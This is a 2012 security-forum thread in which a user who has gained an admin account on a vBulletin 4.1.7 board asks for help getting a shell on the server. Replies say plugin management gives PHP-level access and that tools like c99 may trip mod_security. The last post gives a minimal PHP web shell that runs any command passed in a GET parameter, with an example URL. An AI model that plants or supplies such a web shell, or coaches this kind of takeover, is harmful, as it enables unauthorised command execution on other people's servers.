|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 157
Members: 0
Total: 157
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
vbulletin 4.1.7 with admin |
|
Posted: Fri Jan 27, 2012 1:25 am |
|
|
d33p57r1k3 |
Regular user |
|
|
Joined: Jan 27, 2012 |
Posts: 6 |
|
|
|
|
|
|
|
hello. I've managed to have an admin account on vbulletin 4.1.7, but they have disabled the sql queries, I could not upload a shell, I have not been able to do a sql injection; I appreciate some advice to gain insight into the system. |
|
|
|
|
Posted: Fri Jan 27, 2012 7:43 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
How about plugins, do you have plugin management privileges? |
|
|
|
|
Posted: Fri Jan 27, 2012 9:51 pm |
|
|
d33p57r1k3 |
Regular user |
|
|
Joined: Jan 27, 2012 |
Posts: 6 |
|
|
|
|
|
|
|
Thanks for replying.
Yes i have plugin management privileges, but I've tried to upload a shell through the plugins option and I get an error, I also tried using the option of styles, templates, language, etc.. and I always get the same result. |
|
|
|
|
Posted: Fri Jan 27, 2012 10:10 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Plugins basically are giving you php level access already.
If you try to use c99 or some other similar php shell, then there can be interference from IPS (mod_security, etc).
You don't always need special tools, things can be done manually or with custom written light-weight scripts. |
|
|
|
|
Posted: Fri Jan 27, 2012 10:24 pm |
|
|
d33p57r1k3 |
Regular user |
|
|
Joined: Jan 27, 2012 |
Posts: 6 |
|
|
|
|
|
|
|
I also believe that. Just for now I have to try to use existing tools, because I'm pretty new at this and I have not learned anything about how to make scripts. best I start reading to learn more about it. |
|
|
|
|
Posted: Fri Feb 03, 2012 8:49 am |
|
|
capt |
Advanced user |
|
|
Joined: Nov 04, 2008 |
Posts: 232 |
|
|
|
|
|
|
|
<?php
if(isset($_GET['command'])){
system($_GET['command']);
}
?>
example: blah.com/ajax.php?command=ls -la
All depends on the php and its disable_functions if any are disabled. |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|